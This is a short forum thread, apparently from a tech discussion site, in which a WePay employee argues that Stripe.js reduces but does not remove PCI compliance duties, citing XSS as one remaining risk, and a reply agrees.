|
|
|
|
|
|
by lsh123
5314 days ago
|
|
|
Disclaimer: I work for WePay and I am directly responsible for WePay's PCI audit process I am sure everyone would agree that PCI spec is complex and not easy to understand :) Said that, its intention is pretty clear: protect credit card information from leaking to "bad" guys. A great deal of PCI spec is about protecting the stored credit card data. You are absolutely correct that Stripe's JS solution allows one to avoid dealing with these issues. However, many other sections of PCI spec discuss other potential vectors of attacks. For example, if you don't follow security coding guidelines then an attacker can embed a malicious JS on your website (through XSS or other attacks) and steal credit cards information. Obviously, the suggestion to serve your pages from SSL don't help you to avoid these problems. I think Stripe's model is great. But I don't believe that it allows one to completely avoid PCI compliance. I believe that you correctly phrased it on the stripe's home page: "Stripe.js lets you build your own payment forms while still avoiding most PCI requirements." |
|
|
So basically: Be smart about what goes on your sensitive, mission-critical payment-receiving pages, as you should be. It's not extremely difficult. A little bit more responsibility in turn for more flexibility.